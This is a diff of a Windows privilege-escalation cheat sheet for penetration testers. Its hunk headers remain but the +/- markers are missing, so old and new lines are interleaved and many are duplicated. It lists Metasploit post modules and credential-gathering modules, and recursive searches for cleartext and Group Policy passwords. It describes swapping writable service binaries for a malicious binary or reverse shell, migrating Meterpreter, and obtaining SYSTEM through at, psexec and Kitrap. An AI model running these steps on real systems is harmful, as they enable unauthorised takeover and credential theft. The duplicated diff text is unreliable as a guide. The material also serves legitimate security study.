So if you have a metasploit meterpreter session going you can run **getsystem**.
### Post modules
First you need to background the meterpreter shell and then you just run the post modules.
You can also try some different post modules.
```
use exploit/windows/local/service_permissions
post/windows/gather/credentials/gpp
exploit/windows/local/trusted_service_path
run post/windows/gather/credential_collector
run post/multi/recon/local_exploit_suggester
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
run post/windows/gather/checkvm
```
## Manually
### Basic Enumeration of the System
Before we start looking for privilege escalation opportunities we need to understand a bit about the machine.
## Basic Enumeration of the System
Before we start looking for privilege escalation opportunities we need to understand a bit about the machine. We need to know what users have privileges. What patches/hotfixes the system has.
```
# Basics
systeminfo
hostname
@@ -106,12 +22,19 @@ hostname
whoami
echo %username%
# What users are on the machine?
# What users/localgroups are on the machine?
net users
net localgroups
# More info about a specific user
# More info about a specific user. Check if user has privileges.
net user user1
# View Domain Groups
net group /domain
# View Members of Domain Group
net group /domain <Group Name>
# Firewall
netsh firewall show state
netsh firewall show config
@@ -120,13 +43,14 @@ netsh firewall show config
ipconfig /all
route print
arp -A
```
Even the manual way can be speeded up. Using this awesome script (wmic_info.bat). Found here: http://www.fuzzysecurity.com/tutorials/16.html
# How well patched is the system?
wmic qfe get Caption,Description,HotFixID,InstalledOn
```
### Cleartext passwords
## Cleartext Passwords
Can be find like this:
### Search for them
```
findstr /si password *.txt
@@ -136,14 +60,15 @@ findstr /si password *.ini
#Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*
# Find all pass in all files.
# Find all passwords in all files.
findstr /spin "password" *.*
findstr /spin "password" *.*
```
### In Files
These are common files to find them in. They might be base64-encoded. So look out for that.
If the machine belongs to a domain and your user has access to "System Volume Information" there might be some sensitive files there.
### Group Policy Preference
If the machine belongs to a domain and your user has access to **System Volume Information** there might be some sensitive files there.
Look for the file **Groups.xml**. It might be encrpted the password. But the encryption.key can be found on windows homepage. Other interesting files here might be
Look for the file **Groups.xml**. It might be encrypted the password. But the encryption.key can be found on windows homepage. Other interesting files here might be
Sometimes there are services that are only accessible from inside the network. For example a MySQL server might not be accessible from the outside, for security reasons. It is also common to have different administration applications that is only accessible for the target. Like a printer interface, or something like that. These services might be more vulnerable since they are not meant to be seen from the outside.
## Internal/Hidden Services
So basically run
Sometimes there are services that are only accessible from inside the network. For example a MySQL server might not be accessible from the outside, for security reasons. It is also common to have different administration applications that is only accessible from inside the network/machine. Like a printer interface, or something like that. These services might be more vulnerable since they are not meant to be seen from the outside.
```
netstat -ano
```
And look for LISTENING. Then you compare that to the scan you did from the outside.
Does it contain any ports that are not accessible from the outside?
If that is the case, maybe you can make a remote forward to access it.
Local address 0.0.0.0 means that the service is listening on all interfaces. This means that it can receive a connection from the network card, from the loopback interface or any other interface. This means that anyone can connect to it.
**Local address 127.0.0.1**
Local address 127.0.0.1 means that the service is only listening for connection from the your PC. Not from the internet or anywhere else. This is interesting to us!
Local address 127.0.0.1 means that the service is only listening for connection from the your PC. Not from the internet or anywhere else. **This is interesting to us!**
**192.168.1.9**
Local address 192.168.1.9 means that the service is only listening for connections from the local network. So someone in the local network can connect to it, but not someone from the internet. This is also interesting to us!
**Local address 192.168.1.9**
Local address 192.168.1.9 means that the service is only listening for connections from the local network. So someone in the local network can connect to it, but not someone from the internet. **This is also interesting to us!**
### Kernel exploits
## Kernel exploits
Just as in windows kernel exploits should be our last resource, since it might but the machine in an unstable state or create some other problem with the machine.
@@ -252,13 +176,13 @@ wmic qfe get Caption,Description,HotFixID,InstalledOn
```
#### Python to binary
### Python to Binary
If we have an exploit written in python but we don't have python installed on the victim-machine we can always transform it into a binary with pyinstaller. Good trick to know.
### Schedualed tasks
## Scheduled Tasks
Here we are looking for tasks that are run with by a priviliged user, and run a binary that we can overwrite.
Here we are looking for tasks that are run with by a privileged user, and run a binary that we can overwrite.
```
schtasks /query /fo LIST /v
@@ -266,30 +190,29 @@ schtasks /query /fo LIST /v
This might produce a huge amount of text. I have not been able to figure out how to just output the relevant strings with findstr. So if you know a better way please notify me. As for now I just copy-paste the text and past it into my linux-terminal and run.
Yeah I know this ain't pretty, but it works. You can of course change the name SYSTEM to another priviliged user.
Yeah I know this ain't pretty, but it works. You can of course change the name SYSTEM to another privileged user.
```
cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
```
### Weak service permissions
## Weak Service Permissions
Services on windows are programs that run in the background. Without a GUI.
If you find a service that has read-write permissions set to everyone you can just change that binary into a binary that adds a user to the administrators group and thereby giving it privileges.
First we need to find services. That can be done using **wmci**. Wmci is not availbe on all windows machines, and it might not be avaliable to your user. If you don't have access to it, there is a workaround using sc.exe. See further down. But if wmci is availible, you can use it like this.
If you find a service that has write permissions set to everyone you can change that binary into your custom binary and make it execute in the privileged context.
First we need to find services. That can be done using **wmci** or **sc.exe**. Wmci is not available on all windows machines, and it might not be available to your user. If you don't have access to it, you can use **sc.exe**.
#### WMCI
### WMCI
```
wmic service list brief
```
This will produce a lot out output and we need to know which one of all of these services have weak permissions. In order to check that we can use the icalcs program. Notice that icalcs is only available from Vista and up. XP has calcs instead.
This will produce a lot out output and we need to know which one of all of these services have weak permissions. In order to check that we can use the **icalcs** program. Notice that **icalcs** is only available from Vista and up. XP and lower has **calcs** instead.
As you can see in the command you need to make sure that you have access to wimc, icalcs and write privilege in windows\temp.
As you can see in the command below you need to make sure that you have access to wimc, icalcs and write privilege in windows\temp.
```
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
@@ -297,7 +220,9 @@ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
```
##### SC.exe
Binaries in system32 are excluded since they are mostly correct, since they are installed by windows.
#### SC.exe
```
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt
@@ -316,19 +241,22 @@ Now you can process them one by one with the cacls command.
cacls "C:\path\to\file.exe"
```
Binaries in system32 are excluded sine they are mostly correct, since they are installed by windows. What we are interested in is binaries that have been installed by the user.In the output you want to look for **BUILTIN\Users:(F)**.
### Look for Weakness
What we are interested in is binaries that have been installed by the user. In the output you want to look for **BUILTIN\Users:(F)**. Or where your user/usergroup has **(F)** or **(C)** rights.
That means your user has write access. So you can just rename the .exe file and add your own. And then restart the program and your program will be exevuted instead. This can be a simple getsuid program or a reverse shell that you create with msfvenom.
That means your user has write access. So you can just rename the .exe file and then add your own malicious binary. And then restart the program and your binary will be executed instead. This can be a simple getsuid program or a reverse shell that you create with msfvenom.
Here is a POC code for getsuid.
@@ -342,21 +270,29 @@ return 0;
}
```
We then compile it with out cross-compiler, if you are on linux, like this:
We then compile it with our cross-compiler like this:
Okay, so now that we have either create our setuid or our reverse shell we need to restart the program, we can do that using wmci. Like this
Okay, so now that we have a malicious binary in place we need to restart the service so that it gets executed. We can do this by using **wmic** or **net** the following way:
```
wmic service NAMEOFSERVICE call startservice
```
If your meterpreter session dies you need to remember to first migrate it to a more stable service. A common service to migrate to is winlogon.exe since it is run by system and it is always run. You can find the PID like this
```
net stop [service name] && net start [service name].
```
The binary should be executed in the SYSTEM or Administrator context.
### Migrate the Meterpreter Shell
If your meterpreter session dies right after you get it you need migrate it to a more stable service. A common service to migrate to is winlogon.exe since it is run by system and it is always run. You can find the PID like this:
```
wmic process list brief | find "winlogon"
@@ -364,21 +300,23 @@ wmic process list brief | find "winlogon"
So when you get the shell you can either type **migrate PID** or automate this so that meterpreter automatically migrates.
### Get SYSTEM user from a user with Administrator privilieges.
## Escalate to SYSTEM from Administrator
#### On windows XP
### On Windows XP and Older
If you have a GUI with a user that is included in Administrators group you first need to open up a cmd.exe for the administrator. If you open up the cmd that is in Accessories it will be opened up as a normal user. And if you rightclik and do Run as administrator you might need to know the Administrators password. Which you might not know. So instead you open up the cmd from c:\windows\system32\cmd.exe. This will give you a cmd with Administratos rights.
If you have a GUI with a user that is included in Administrators group you first need to open up a cmd.exe for the administrator. If you open up the cmd that is in Accessories it will be opened up as a normal user. And if you rightclick and do **Run as Administrator** you might need to know the Administrators password. Which you might not know. So instead you open up the cmd from **c:\windows\system32\cmd.exe**. This will give you a cmd with Administratos rights.
From here we want to become SYSTEM user. To do this we run:
@@ -405,13 +342,12 @@ First we check what time it is on the local machine:
time
# Now we set the time we want the system CMD to start. Probably one minuter after the time.
at 01:23 /interactive cmd.exe
```
And then the cmd with SYSTEM privs pops up.
#### Vista and up
### Vista and Newer
You first need to upload PsExec.exe anad then you run:
@@ -419,6 +355,16 @@ You first need to upload PsExec.exe anad then you run:
psexec -i -s cmd.exe
```
### Kitrap
On some machines the **at 20:20** trick does not work. It never works on Windows 2003 for example. Instead you can use Kitrap. Upload both files and execute vdmaillowed.exe. I think it only works with GUI.
